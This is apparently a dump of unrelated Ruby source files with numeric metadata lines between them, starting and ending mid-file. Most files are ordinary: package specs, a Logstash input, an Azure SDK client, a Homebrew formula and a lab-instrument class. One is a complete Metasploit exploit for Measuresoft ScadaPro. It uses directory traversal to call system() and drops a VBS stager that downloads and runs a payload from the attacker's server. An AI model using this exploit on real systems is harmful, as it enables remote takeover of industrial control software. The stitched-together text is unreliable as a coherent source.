  s.name             = 'porcupine'
  s.version          = '1.9.0'
  s.summary          = 'A Flutter package plugin for Picovoice\'s Porcupine wake word engine'
  s.description      = <<-DESC
  A Flutter package plugin for Picovoice\'s Porcupine wake word engine.
                       DESC
  s.homepage         = 'https://picovoice.ai/'
  s.license          = { :type => 'Apache-2.0' }
  s.author           = { 'Picovoice' => '[email protected]' }
  s.source           = { :git => "https://github.com/Picovoice/porcupine.git" }
  s.source_files     = 'Classes/**/*'
  s.platform         = :ios, '9.0'
  s.dependency 'Flutter'
  s.static_framework = true

  # Flutter.framework does not contain a i386 slice.
  s.pod_target_xcconfig = { 'OTHER_LDFLAGS' => '-ObjC', 'EXCLUDED_ARCHS[sdk=iphonesimulator*]' => 'i386'}

  s.subspec 'pv_porcupine' do |sc|
    sc.pod_target_xcconfig = {
      'SWIFT_INCLUDE_PATHS' => '$(PODS_TARGET_SRCROOT)/pv_porcupine',
      'OTHER_CFLAGS' => '-Xcc -fmodule-map-file="${PODS_TARGET_SRCROOT}/pv_porcupine/module.private.modulemap"',
      'OTHER_SWIFT_FLAGS' => '-Xcc -fmodule-map-file="${PODS_TARGET_SRCROOT}/pv_porcupine/module.private.modulemap"',
    }
    sc.vendored_libraries = 'pv_porcupine/libpv_porcupine.a'
    sc.source_files = 'pv_porcupine/pv_porcupine.h', 'pv_porcupine/picovoice.h'
    sc.public_header_files = 'pv_porcupine/pv_porcupine.h', 'pv_porcupine/picovoice.h'
    sc.preserve_paths = 'pv_porcupine/libpv_porcupine.a', 'pv_porcupine/module.private.modulemap'
  end

  s.swift_version = '5.0'
end
44.75
127
0.638734
bb78682ee30f4423ba9a05c5cc45419edd5de98c
4,932
require "logstash/inputs/base" require "logstash/namespace" require "pathname" require "socket" # for Socket.gethostname # Stream events from files. # # By default, each event is assumed to be one line. If you # want to join lines, you'll want to use the multiline filter. # # Files are followed in a manner similar to "tail -0F". File rotation # is detected and handled by this input. class LogStash::Inputs::File < LogStash::Inputs::Base config_name "file" plugin_status "beta" # The path to the file to use as an input. # You can use globs here, such as `/var/log/*.log` # Paths must be absolute and cannot be relative. config :path, :validate => :array, :required => true # Exclusions (matched against the filename, not full path). Globs # are valid here, too. For example, if you have # # path => "/var/log/*" # # you might want to exclude gzipped files: # # exclude => "*.gz" config :exclude, :validate => :array # How often we stat files to see if they have been modified. Increasing # this interval will decrease the number of system calls we make, but # increase the time to detect new log lines. config :stat_interval, :validate => :number, :default => 1 # How often we expand globs to discover new files to watch. config :discover_interval, :validate => :number, :default => 15 # Where to write the since database (keeps track of the current # position of monitored log files). The default will write # sincedb files to some path matching "$HOME/.sincedb*" config :sincedb_path, :validate => :string # How often to write a since database with the current position of # monitored log files. config :sincedb_write_interval, :validate => :number, :default => 15 # Choose where logstash starts initially reading files - at the beginning or # at the end. The default behavior treats files like live streams and thus # starts at the end. If you have old data you want to import, set this # to 'beginning' # # This option only modifieds "first contact" situations where a file is new # and not seen before. If a file has already been seen before, this option # has no effect. config :start_position, :validate => [ "beginning", "end"], :default => "end" public def initialize(params) super @path.each do |path| if Pathname.new(path).relative? raise ArgumentError.new("File paths must be absolute, relative path specified: #{path}") end end end public def register require "addressable/uri" require "filewatch/tail" require "digest/md5" LogStash::Util::set_thread_name("input|file|#{path.join(":")}") @logger.info("Registering file input", :path => @path) @tail_config = { :exclude => @exclude, :stat_interval => @stat_interval, :discover_interval => @discover_interval, :sincedb_write_interval => @sincedb_write_interval, :logger => @logger, } if @sincedb_path.nil? if ENV["HOME"].nil? @logger.error("No HOME environment variable set, I don't know where " \ "to keep track of the files I'm watching. 
Either set " \ "HOME in your environment, or set sincedb_path in " \ "in your logstash config for the file input with " \ "path '#{@path.inspect}'") raise # TODO(sissel): HOW DO I FAIL PROPERLY YO end # Join by ',' to make it easy for folks to know their own sincedb # generated path (vs, say, inspecting the @path array) @sincedb_path = File.join(ENV["HOME"], ".sincedb_" + Digest::MD5.hexdigest(@path.join(","))) # Migrate any old .sincedb to the new file (this is for version <=1.1.1 compatibility) old_sincedb = File.join(ENV["HOME"], ".sincedb") if File.exists?(old_sincedb) @logger.info("Renaming old ~/.sincedb to new one", :old => old_sincedb, :new => @sincedb_path) File.rename(old_sincedb, @sincedb_path) end @logger.info("No sincedb_path set, generating one based on the file path", :sincedb_path => @sincedb_path, :path => @path) end @tail_config[:sincedb_path] = @sincedb_path if @start_position == "beginning" @tail_config[:start_new_files_at] = :beginning end end # def register public def run(queue) @tail = FileWatch::Tail.new(@tail_config) @tail.logger = @logger @path.each { |path| @tail.tail(path) } hostname = Socket.gethostname @tail.subscribe do |path, line| source = Addressable::URI.new(:scheme => "file", :host => hostname, :path => path).to_s @logger.debug("Received line", :path => path, :line => line) e = to_event(line, source) if e queue << e end end finished end # def run public def teardown @tail.quit end # def teardown end # class LogStash::Inputs::File
34.48951
98
0.652068
1c75ac9922730f038cc61c648ac8e244a5e2e2bb
1,369
# frozen_string_literal: true

require 'spec_helper'

describe Gitlab::NotifyUponDeath do
  let(:worker_class) do
    Class.new do
      include Sidekiq::Worker
      include Gitlab::NotifyUponDeath
    end
  end

  describe '.sidekiq_retries_exhausted' do
    it 'notifies the JobWaiter when 3 arguments are given and the last is a String' do
      job = { 'args' => [12, {}, '123abc'], 'jid' => '123' }

      expect(Gitlab::JobWaiter)
        .to receive(:notify)
        .with('123abc', '123')

      worker_class.sidekiq_retries_exhausted_block.call(job)
    end

    it 'does not notify the JobWaiter when only 2 arguments are given' do
      job = { 'args' => [12, {}], 'jid' => '123' }

      expect(Gitlab::JobWaiter)
        .not_to receive(:notify)

      worker_class.sidekiq_retries_exhausted_block.call(job)
    end

    it 'does not notify the JobWaiter when only 1 argument is given' do
      job = { 'args' => [12], 'jid' => '123' }

      expect(Gitlab::JobWaiter)
        .not_to receive(:notify)

      worker_class.sidekiq_retries_exhausted_block.call(job)
    end

    it 'does not notify the JobWaiter when the last argument is not a String' do
      job = { 'args' => [12, {}, 40], 'jid' => '123' }

      expect(Gitlab::JobWaiter)
        .not_to receive(:notify)

      worker_class.sidekiq_retries_exhausted_block.call(job)
    end
  end
end
26.326923
86
0.641344
28962230388f08fbc418e35bcf4d69d5d2b13842
2,073
# encoding: UTF-8
module Axlsx
  # A ScatterSeries defines the x and y position of data in the chart
  # @note The recommended way to manage series is to use Chart#add_series
  # @see Worksheet#add_chart
  # @see Chart#add_series
  # @see examples/example.rb
  class ScatterSeries < Series
    # The x data for this series.
    # @return [NamedAxisData]
    attr_reader :xData

    # The y data for this series.
    # @return [NamedAxisData]
    attr_reader :yData

    # The fill color for this series.
    # Red, green, and blue is expressed as sequence of hex digits, RRGGBB. A perceptual gamma of 2.2 is used.
    # @return [String]
    attr_reader :color

    # Creates a new ScatterSeries
    def initialize(chart, options={})
      @xData, @yData = nil
      super(chart, options)
      @xData = AxDataSource.new(:tag_name => :xVal, :data => options[:xData]) unless options[:xData].nil?
      @yData = NumDataSource.new({:tag_name => :yVal, :data => options[:yData]}) unless options[:yData].nil?
    end

    # @see color
    def color=(v)
      @color = v
    end

    # Serializes the object
    # @param [String] str
    # @return [String]
    def to_xml_string(str = '')
      super(str) do
        # needs to override the super color here to push in ln/and something else!
        if color
          str << '<c:spPr><a:solidFill>'
          str << ('<a:srgbClr val="' << color << '"/>')
          str << '</a:solidFill>'
          str << '<a:ln><a:solidFill>'
          str << ('<a:srgbClr val="' << color << '"/></a:solidFill></a:ln>')
          str << '</c:spPr>'

          str << '<c:marker>'
          str << '<c:spPr><a:solidFill>'
          str << ('<a:srgbClr val="' << color << '"/>')
          str << '</a:solidFill>'
          str << '<a:ln><a:solidFill>'
          str << ('<a:srgbClr val="' << color << '"/></a:solidFill></a:ln>')
          str << '</c:spPr>'
          str << '</c:marker>'
        end

        @xData.to_xml_string(str) unless @xData.nil?
        @yData.to_xml_string(str) unless @yData.nil?
      end
      str
    end
  end
end
31.409091
109
0.56247
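For context, a sketch of how a scatter series is usually created through axlsx's public API rather than by instantiating ScatterSeries directly, following the pattern shown in the gem's README; the worksheet layout, cell ranges, and color are illustrative.

# Illustrative sketch (not part of the file above). Chart#add_series forwards
# the options hash to ScatterSeries#initialize, so xData/yData/color end up in
# the accessors defined there.
require 'axlsx'

package = Axlsx::Package.new
package.workbook.add_worksheet(name: 'data') do |sheet|
  sheet.add_row ['x', 1, 2, 3]
  sheet.add_row ['y', 4, 5, 6]
  sheet.add_chart(Axlsx::ScatterChart, start_at: [0, 4], end_at: [8, 20]) do |chart|
    chart.add_series xData: sheet['B1:D1'], yData: sheet['B2:D2'],
                     title: 'sample', color: 'FF0000'
  end
end
package.serialize('scatter.xlsx')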
e29d984df94cadf3b847d3f1bd5df6a8248d0729
44
module EventMachine
  VERSION = "1.2.1"
end
11
19
0.704545
216a97f8771375dd634cc2c74a49e0e70392bb6c
4,333
## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpServer::HTML include Msf::Exploit::Remote::Tcp include Msf::Exploit::EXE def initialize(info = {}) super(update_info(info, 'Name' => 'Measuresoft ScadaPro Remote Command Execution', 'Description' => %q{ This module allows remote attackers to execute arbitray commands on the affected system by abusing via Directory Traversal attack when using the 'xf' command (execute function). An attacker can execute system() from msvcrt.dll to upload a backdoor and gain remote code execution. This vulnerability affects version 4.0.0 and earlier. }, 'License' => MSF_LICENSE, 'Author' => [ 'Luigi Auriemma', # Initial discovery/poc 'mr_me <steventhomasseeley[at]gmail.com>', # msf 'TecR0c <tecr0c[at]tecninja.net>', # msf ], 'References' => [ [ 'CVE', '2011-3497'], [ 'BID', '49613'], [ 'URL', 'http://aluigi.altervista.org/adv/scadapro_1-adv.txt'], [ 'URL', 'http://us-cert.gov/control_systems/pdf/ICS-ALERT-11-256-04.pdf'], # seemed pretty accurate to us ;) [ 'URL', 'http://www.measuresoft.net/news/post/Inaccurate-Reports-of-Measuresoft-ScadaPro-400-Vulnerability.aspx'], ], 'DefaultOptions' => { 'InitialAutoRunScript' => 'migrate -f', }, 'Platform' => 'win', 'Targets' => [ # truly universal [ 'Automatic', { } ], ], 'DefaultTarget' => 0, 'DisclosureDate' => 'Sep 16 2011')) register_options( [ Opt::RPORT(11234), OptString.new('URIPATH', [ true, "The URI to use.", "/" ]), ], self.class) end # couldn't generate a vbs or exe payload and then use the wF command # as there is a limit to the amount of data to write to disk. # so we just write out a vbs script like the old days. def build_vbs(url, stager_name) name_xmlhttp = rand_text_alpha(2) name_adodb = rand_text_alpha(2) tmp = "#{@temp_folder}/#{stager_name}" vbs = "echo Set #{name_xmlhttp} = CreateObject(\"Microsoft.XMLHTTP\") " vbs << ": #{name_xmlhttp}.open \"GET\",\"http://#{url}\",False : #{name_xmlhttp}.send" vbs << ": Set #{name_adodb} = CreateObject(\"ADODB.Stream\") " vbs << ": #{name_adodb}.Open : #{name_adodb}.Type=1 " vbs << ": #{name_adodb}.Write #{name_xmlhttp}.responseBody " vbs << ": #{name_adodb}.SaveToFile \"#{@temp_folder}/#{@payload_name}.exe\",2 " vbs << ": CreateObject(\"WScript.Shell\").Run \"#{@temp_folder}/#{@payload_name}.exe\",0 >> #{tmp}" return vbs end def on_request_uri(cli, request) if request.uri =~ /\.exe/ print_status("Sending 2nd stage payload") return if ((p=regenerate_payload(cli)) == nil) data = generate_payload_exe( {:code=>p.encoded} ) send_response(cli, data, {'Content-Type' => 'application/octet-stream'} ) return end end def exploit # In order to save binary data to the file system the payload is written to a .vbs # file and execute it from there. 
@payload_name = rand_text_alpha(4) @temp_folder = "C:/Windows/Temp" if datastore['SRVHOST'] == '0.0.0.0' lhost = Rex::Socket.source_address('50.50.50.50') else lhost = datastore['SRVHOST'] end payload_src = lhost payload_src << ":#{datastore['SRVPORT']}#{datastore['URIPATH']}#{@payload_name}.exe" stager_name = rand_text_alpha(6) + ".vbs" stager = build_vbs(payload_src, stager_name) path = "..\\..\\..\\..\\..\\windows\\system32" createvbs = "xf%#{path}\\msvcrt.dll,system,cmd /c #{stager}\r\n" download_execute = "xf%#{path}\\msvcrt.dll,system,start #{@temp_folder}/#{stager_name}\r\n" print_status("Sending 1st stage payload...") connect sock.get_once() sock.put(createvbs) sock.get_once() sock.put(download_execute) handler() disconnect super end end
33.589147
125
0.600969
4a2e038318c90a7060c108707c49c9eeff9bef52
71
class WelcomeController < ApplicationController
  def index
  end
end
14.2
47
0.802817
79b8ec5a56ca8ab54b5394181e57ad266490c7c3
8,527
# encoding: utf-8 # Code generated by Microsoft (R) AutoRest Code Generator. # Changes may cause incorrect behavior and will be lost if the code is # regenerated. module Azure::Signalr::Mgmt::V2018_10_01 # # REST API for Azure SignalR Service # class Operations include MsRestAzure # # Creates and initializes a new instance of the Operations class. # @param client service class for accessing basic functionality. # def initialize(client) @client = client end # @return [SignalRManagementClient] reference to the SignalRManagementClient attr_reader :client # # Lists all of the available REST API operations of the # Microsoft.SignalRService provider. # # @param custom_headers [Hash{String => String}] A hash of custom headers that # will be added to the HTTP request. # # @return [Array<Operation>] operation results. # def list(custom_headers:nil) first_page = list_as_lazy(custom_headers:custom_headers) first_page.get_all_items end # # Lists all of the available REST API operations of the # Microsoft.SignalRService provider. # # @param custom_headers [Hash{String => String}] A hash of custom headers that # will be added to the HTTP request. # # @return [MsRestAzure::AzureOperationResponse] HTTP response information. # def list_with_http_info(custom_headers:nil) list_async(custom_headers:custom_headers).value! end # # Lists all of the available REST API operations of the # Microsoft.SignalRService provider. # # @param [Hash{String => String}] A hash of custom headers that will be added # to the HTTP request. # # @return [Concurrent::Promise] Promise object which holds the HTTP response. # def list_async(custom_headers:nil) fail ArgumentError, '@client.api_version is nil' if @client.api_version.nil? request_headers = {} request_headers['Content-Type'] = 'application/json; charset=utf-8' # Set Headers request_headers['x-ms-client-request-id'] = SecureRandom.uuid request_headers['accept-language'] = @client.accept_language unless @client.accept_language.nil? path_template = 'providers/Microsoft.SignalRService/operations' request_url = @base_url || @client.base_url options = { middlewares: [[MsRest::RetryPolicyMiddleware, times: 3, retry: 0.02], [:cookie_jar]], query_params: {'api-version' => @client.api_version}, headers: request_headers.merge(custom_headers || {}), base_url: request_url } promise = @client.make_request_async(:get, path_template, options) promise = promise.then do |result| http_response = result.response status_code = http_response.status response_content = http_response.body unless status_code == 200 error_model = JSON.load(response_content) fail MsRestAzure::AzureOperationError.new(result.request, http_response, error_model) end result.request_id = http_response['x-ms-request-id'] unless http_response['x-ms-request-id'].nil? result.correlation_request_id = http_response['x-ms-correlation-request-id'] unless http_response['x-ms-correlation-request-id'].nil? result.client_request_id = http_response['x-ms-client-request-id'] unless http_response['x-ms-client-request-id'].nil? # Deserialize Response if status_code == 200 begin parsed_response = response_content.to_s.empty? ? 
nil : JSON.load(response_content) result_mapper = Azure::Signalr::Mgmt::V2018_10_01::Models::OperationList.mapper() result.body = @client.deserialize(result_mapper, parsed_response) rescue Exception => e fail MsRest::DeserializationError.new('Error occurred in deserializing the response', e.message, e.backtrace, result) end end result end promise.execute end # # Lists all of the available REST API operations of the # Microsoft.SignalRService provider. # # @param next_page_link [String] The NextLink from the previous successful call # to List operation. # @param custom_headers [Hash{String => String}] A hash of custom headers that # will be added to the HTTP request. # # @return [OperationList] operation results. # def list_next(next_page_link, custom_headers:nil) response = list_next_async(next_page_link, custom_headers:custom_headers).value! response.body unless response.nil? end # # Lists all of the available REST API operations of the # Microsoft.SignalRService provider. # # @param next_page_link [String] The NextLink from the previous successful call # to List operation. # @param custom_headers [Hash{String => String}] A hash of custom headers that # will be added to the HTTP request. # # @return [MsRestAzure::AzureOperationResponse] HTTP response information. # def list_next_with_http_info(next_page_link, custom_headers:nil) list_next_async(next_page_link, custom_headers:custom_headers).value! end # # Lists all of the available REST API operations of the # Microsoft.SignalRService provider. # # @param next_page_link [String] The NextLink from the previous successful call # to List operation. # @param [Hash{String => String}] A hash of custom headers that will be added # to the HTTP request. # # @return [Concurrent::Promise] Promise object which holds the HTTP response. # def list_next_async(next_page_link, custom_headers:nil) fail ArgumentError, 'next_page_link is nil' if next_page_link.nil? request_headers = {} request_headers['Content-Type'] = 'application/json; charset=utf-8' # Set Headers request_headers['x-ms-client-request-id'] = SecureRandom.uuid request_headers['accept-language'] = @client.accept_language unless @client.accept_language.nil? path_template = '{nextLink}' request_url = @base_url || @client.base_url options = { middlewares: [[MsRest::RetryPolicyMiddleware, times: 3, retry: 0.02], [:cookie_jar]], skip_encoding_path_params: {'nextLink' => next_page_link}, headers: request_headers.merge(custom_headers || {}), base_url: request_url } promise = @client.make_request_async(:get, path_template, options) promise = promise.then do |result| http_response = result.response status_code = http_response.status response_content = http_response.body unless status_code == 200 error_model = JSON.load(response_content) fail MsRestAzure::AzureOperationError.new(result.request, http_response, error_model) end result.request_id = http_response['x-ms-request-id'] unless http_response['x-ms-request-id'].nil? result.correlation_request_id = http_response['x-ms-correlation-request-id'] unless http_response['x-ms-correlation-request-id'].nil? result.client_request_id = http_response['x-ms-client-request-id'] unless http_response['x-ms-client-request-id'].nil? # Deserialize Response if status_code == 200 begin parsed_response = response_content.to_s.empty? ? 
nil : JSON.load(response_content) result_mapper = Azure::Signalr::Mgmt::V2018_10_01::Models::OperationList.mapper() result.body = @client.deserialize(result_mapper, parsed_response) rescue Exception => e fail MsRest::DeserializationError.new('Error occurred in deserializing the response', e.message, e.backtrace, result) end end result end promise.execute end # # Lists all of the available REST API operations of the # Microsoft.SignalRService provider. # # @param custom_headers [Hash{String => String}] A hash of custom headers that # will be added to the HTTP request. # # @return [OperationList] which provide lazy access to pages of the response. # def list_as_lazy(custom_headers:nil) response = list_async(custom_headers:custom_headers).value! unless response.nil? page = response.body page.next_method = Proc.new do |next_page_link| list_next_async(next_page_link, custom_headers:custom_headers) end page end end end end
37.730088
141
0.684649
7aa838286909cf1565f8d7d1dcf2004d7ddd2493
3,090
#
# Gems
#
require 'active_support/core_ext/module/introspection'

#
# Project
#
require 'metasploit/framework/command'
require 'metasploit/framework/parsed_options'
require 'metasploit/framework/require'

# Based on pattern used for lib/rails/commands in the railties gem.
class Metasploit::Framework::Command::Base
  #
  # Attributes
  #

  # @!attribute [r] application
  #   The Rails application for metasploit-framework.
  #
  #   @return [Metasploit::Framework::Application]
  attr_reader :application

  # @!attribute [r] parsed_options
  #   The parsed options from the command line.
  #
  #   @return (see parsed_options)
  attr_reader :parsed_options

  #
  # Class Methods
  #

  # @note {require_environment!} should be called to load
  #   `config/application.rb` to so that the RAILS_ENV can be set from the
  #   command line options in `ARGV` prior to `Rails.env` being set.
  # @note After returning, `Rails.application` will be defined and configured.
  #
  # Parses `ARGV` for command line arguments to configure the
  # `Rails.application`.
  #
  # @return (see parsed_options)
  def self.require_environment!
    parsed_options = self.parsed_options
    # RAILS_ENV must be set before requiring 'config/application.rb'
    parsed_options.environment!
    ARGV.replace(parsed_options.positional)

    # allow other Rails::Applications to use this command
    if !defined?(Rails) || Rails.application.nil?
      # @see https://github.com/rails/rails/blob/v3.2.17/railties/lib/rails/commands.rb#L39-L40
      require Pathname.new(__FILE__).parent.parent.parent.parent.parent.join('config', 'application')
    end

    # have to configure before requiring environment because
    # config/environment.rb calls initialize! and the initializers will use
    # the configuration from the parsed options.
    parsed_options.configure(Rails.application)

    Rails.application.require_environment!

    parsed_options
  end

  def self.parsed_options
    parsed_options_class.new
  end

  def self.parsed_options_class
    @parsed_options_class ||= parsed_options_class_name.constantize
  end

  def self.parsed_options_class_name
    @parsed_options_class_name ||= "#{module_parent.module_parent}::ParsedOptions::#{name.demodulize}"
  end

  def self.start
    parsed_options = require_environment!
    new(application: Rails.application, parsed_options: parsed_options).start
  end

  #
  # Instance Methods
  #

  # @param attributes [Hash{Symbol => ActiveSupport::OrderedOptions,Rails::Application}]
  # @option attributes [Rails::Application] :application
  # @option attributes [ActiveSupport::OrderedOptions] :parsed_options
  # @raise [KeyError] if :application is not given
  # @raise [KeyError] if :parsed_options is not given
  def initialize(attributes={})
    @application = attributes.fetch(:application)
    @parsed_options = attributes.fetch(:parsed_options)
  end

  # @abstract Use {#application} to start this command.
  #
  # Starts this command.
  #
  # @return [void]
  # @raise [NotImplementedError]
  def start
    raise NotImplementedError
  end
end
28.348624
102
0.734304
2651002b9b72e6cd99f2d0b6ebb54ac52e28d481
854
require "json" package = JSON.parse(File.read(File.join(__dir__, "package.json"))) Pod::Spec.new do |s| s.name = "react-native-smartad" s.version = package["version"] s.summary = package["description"] s.description = <<-DESC react-native-smartad DESC s.homepage = "https://github.com/RedPillGroup/react-native-smartad" s.license = "MIT" # s.license = { :type => "MIT", :file => "FILE_LICENSE" } s.authors = { "bsisic" => "[email protected]" } s.platforms = { :ios => "9.0" } s.source = { :git => "https://github.com/RedPillGroup/react-native-smartad.git", :tag => "#{s.version}" } s.source_files = "ios/**/*.{h,m,swift}" s.requires_arc = true s.dependency "React" s.dependency "Smart-Display-SDK" # ... # s.dependency "..." end
32.846154
113
0.578454
1aff22430f2329eff4b82c262c5d5add5dd57711
258
class CreateUsers < ActiveRecord::Migration[5.1]
  def change
    create_table :users do |t|
      t.string :name, null: false
      t.boolean :admin, default: false
      t.text :description

      t.timestamps
    end
    add_index :users, :name
  end
end
19.846154
48
0.647287
0865e3bc209ab19cd718827be048f5df1c5896c4
941
module ConsulApplicationSettings
  # Utility methods to cast values and work with path
  module Utils
    SEPARATOR = '/'.freeze
    PARSING_CLASSES = [Integer, Float, ->(value) { JSON.parse(value) }].freeze

    class << self
      def cast_consul_value(value)
        return false if value == 'false'
        return true if value == 'true'
        cast_complex_value(value)
      end

      def generate_path(*parts)
        strings = parts.map(&:to_s)
        all_parts = strings.map { |s| s.split(SEPARATOR) }.flatten
        all_parts.reject(&:empty?).join('/')
      end

      def decompose_path(path)
        parts = path.to_s.split(SEPARATOR).compact
        parts.reject(&:empty?)
      end

      protected

      def cast_complex_value(value)
        PARSING_CLASSES.each do |parser|
          return parser.call(value)
        rescue StandardError => _e
          nil
        end
        value.to_s
      end
    end
  end
end
24.128205
78
0.603613
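A few illustrative calls against the Utils module above; the return values in the comments follow directly from the code as written, and `json` must be required by the host application for the JSON fallback to work.

require 'json' # cast_complex_value relies on JSON.parse being available

utils = ConsulApplicationSettings::Utils

utils.cast_consul_value('true')       # => true
utils.cast_consul_value('42')         # => 42 (Integer parser wins)
utils.cast_consul_value('3.14')       # => 3.14
utils.cast_consul_value('{"a": 1}')   # => {"a"=>1} (falls through to JSON.parse)
utils.cast_consul_value('plain text') # => "plain text"

utils.generate_path('app/', '/db', :host) # => "app/db/host"
utils.decompose_path('/app/db/host')      # => ["app", "db", "host"]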
ab76697e8aa2867c94ad5549d4d104d81324897c
154
class AddOtherRejectionReasonToVisitors < ActiveRecord::Migration[5.1]
  def change
    add_column :visitors, :other_rejection_reason, :boolean
  end
end
25.666667
70
0.798701
619bccc2a2847baf8b5236d207db903db9027c63
377
module NamedVariant class Railtie < ::Rails::Railtie ActiveSupport.on_load(:active_record) do ActiveRecord::Base.extend ::NamedVariant::ActiveRecordExtension ActiveStorage::Attachment.prepend ::NamedVariant::VariantExtension end config.after_initialize do ActiveStorage::Attached::One.prepend ::NamedVariant::VariantExtension end end end
29
75
0.755968
2645137fc3f20b57737e75f9c4c7125d1bac7686
119
require 'test_helper' class StampTest < ActiveSupport::TestCase # test "the truth" do # assert true # end end
14.875
41
0.697479
5d5dcdd8c3d40892fb0df4939f63ff8f6a27f297
3,317
class Leafnode < Formula desc "NNTP server for small sites" homepage "http://www.leafnode.org/" url "https://downloads.sourceforge.net/project/leafnode/leafnode/1.11.11/leafnode-1.11.11.tar.bz2" sha256 "3ec325216fb5ddcbca13746e3f4aab4b49be11616a321b25978ffd971747adc0" bottle :disable, "leafnode hardcodes the user at compile time with no override available." depends_on "pcre" def install (var/"spool/news/leafnode").mkpath system "./configure", "--disable-dependency-tracking", "--prefix=#{prefix}", "--with-user=#{ENV["USER"]}", "--with-group=admin", "--sysconfdir=#{etc}/leafnode", "--with-spooldir=#{var}/spool/news/leafnode" system "make", "install" (prefix/"homebrew.mxcl.fetchnews.plist").write fetchnews_plist (prefix/"homebrew.mxcl.texpire.plist").write texpire_plist end def caveats; <<~EOS For starting fetchnews and texpire, create links, ln -s #{opt_prefix}/homebrew.mxcl.{fetchnews,texpire}.plist ~/Library/LaunchAgents And to start the services, launchctl load -w ~/Library/LaunchAgents/homebrew.mxcl.{fetchnews,texpire}.plist EOS end plist_options :manual => "leafnode" def plist; <<~EOS <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd"> <plist version="1.0"> <dict> <key>OnDemand</key> <true/> <key>Label</key> <string>#{plist_name}</string> <key>Program</key> <string>#{opt_sbin}/leafnode</string> <key>Sockets</key> <dict> <key>Listeners</key> <dict> <key>SockServiceName</key> <string>nntp</string> </dict> </dict> <key>WorkingDirectory</key> <string>#{var}/spool/news</string> <key>inetdCompatibility</key> <dict> <key>Wait</key> <false/> </dict> </dict> </plist> EOS end def fetchnews_plist; <<~EOS <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd"> <plist version="1.0"> <dict> <key>KeepAlive</key> <false/> <key>Label</key> <string>homebrew.mxcl.fetchnews</string> <key>Program</key> <string>#{opt_sbin}/fetchnews</string> <key>StartInterval</key> <integer>1800</integer> <key>WorkingDirectory</key> <string>#{var}/spool/news</string> </dict> </plist> EOS end def texpire_plist; <<~EOS <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd"> <plist version="1.0"> <dict> <key>KeepAlive</key> <false/> <key>Label</key> <string>homebrew.mxcl.texpire</string> <key>Program</key> <string>#{opt_sbin}/texpire</string> <key>StartInterval</key> <integer>25000</integer> <key>WorkingDirectory</key> <string>#{var}/spool/news</string> </dict> </plist> EOS end test do assert_match version.to_s, shell_output("#{bin}/leafnode-version") end end
31.292453
106
0.596322
1a2fc42846a53a178a64c267a377384c94d2a6bd
750
require 'test_helper' class ImportTest < ActiveSupport::TestCase test "be valid" do import = Import.new(:name => "test") import.metadata = File.new("#{Rails.root}/test/fixtures/data/Kaarten-few.csv") user = FactoryGirl.create(:user) import.user = user assert import.valid? end test "import maps" do layer = FactoryGirl.create(:layer) import = Import.new(:name => "test") import.metadata = File.new("#{Rails.root}/test/fixtures/data/Kaarten-few.csv") user = FactoryGirl.create(:user) import.user = user import.layers << layer import.save import.import! puts import.inspect puts import.layers.inspect puts import.maps.inspect puts import.layers.first.maps.inspect end end
25.862069
82
0.68
bb56ce8a1ddc6756784309acd7d1795eafbb0ad0
4,194
# frozen_string_literal: true needs 'Thermocyclers/AbstractThermocycler' # Class for handling BioRad CFX96 qPCR thermocycler # # @author Devin Strickland <[email protected]> # @author Eriberto Lopez <[email protected]> # @note BioRad module originally deployed as `QPCR_ThermocyclerLib` # on UW BIOFAB production 10/05/18 class BioRadCFX96 < AbstractThermocycler include QPCRMixIn MODEL = 'BioRad CFX96' PROGRAM_EXT = '.prcl' LAYOUT_EXT = '.pltd' SOFTWARE_NAME = 'CFX Manager Software' # Instantiates the class # # @return [TestThermocycler] def initialize(name: 'Unnamed Thermocycler') super(name: name) end # Lab-specific, user-defined parameters # # @return [Hash] def user_defined_params { experiment_filepath: 'Desktop/_qPCR_UWBIOFAB', export_filepath: 'Desktop/BIOFAB qPCR Exports', image_path: 'Actions/BioRad_qPCR_Thermocycler', open_software_image: 'open_biorad_thermo_workspace.JPG', setup_workspace_image: 'setup_workspace.JPG', setup_program_image: 'setting_up_qPCR_thermo_conditions.png', setup_plate_layout_image: 'setting_up_plate_layout_v1.png', open_lid_image: 'open_lid.png', close_lid_image: 'close_lid.png', start_run_image: 'start_run.png', export_measurements_image: 'exporting_qPCR_quantification.png', dimensions: [8, 12] } end ########## Language Methods # These methods are not very specific and will probably need to be overridden # in the concrete classes. # Instructions for turning on the thermocycler # # @return [String] def turn_on 'If the thermocycler is off, toggle the power switch in the back of the' \ ' instrument' end # Instructions for opening the software that controls the thermocycler # # @return [String] def open_software "Open #{software_name}" end # Instructions for setting the dye channel on a qPCR thermocycler # # @param composition [PCRComposition] # @param dye_name [String] can be supplied instead of a `PCRComposition` # @return [String] # @todo should be moved to MixIn def set_dye(composition: nil, dye_name: nil) dye_name = composition.dye.try(:input_name) || dye_name "Click on the <b>PrimePCR</b> and choose <b>#{dye_name}</b> as the dye" end # Instructions for selecting the PCR program template in the software # # @param program [PCRProgram] # @return [String] def select_program_template(program:) file = program_template_file(program: program) "Choose the program template <b>#{file}</b>" end # Instructions for selecting the plate layout template in the software # # @param program [PCRProgram] # @return [String] def select_layout_template(program:) file = layout_template_file(program: program) "Choose the layout template <b>#{file}</b>" end # Instructions for placing a plate in the instrument # # @param plate [Collection] # @return [String] def place_plate_in_instrument(plate:) "Place plate #{plate} in the thermocycler" end # Instructions for confirming the orientation of a plate in the instrument # # @return [String] def confirm_plate_orientation 'MAKE SURE THAT THE PLATE IS IN THE CORRECT ORIENTATION' end # Instructions for opening the lid # # @return [String] def open_lid 'Click the <b>Open Lid</b> button' end # Instructions for closing the lid # # @return [String] def close_lid 'Click the <b>Close Lid</b> button' end # Instructions for starting the run # # @return [String] def start_run 'Click the <b>Start Run</b> button' end # Instructions for saving an experiment file # # @param filename [String] the name of the file (without the full path) # @return [String] def save_experiment_file(filename:) "Save the experiment as #{filename} in 
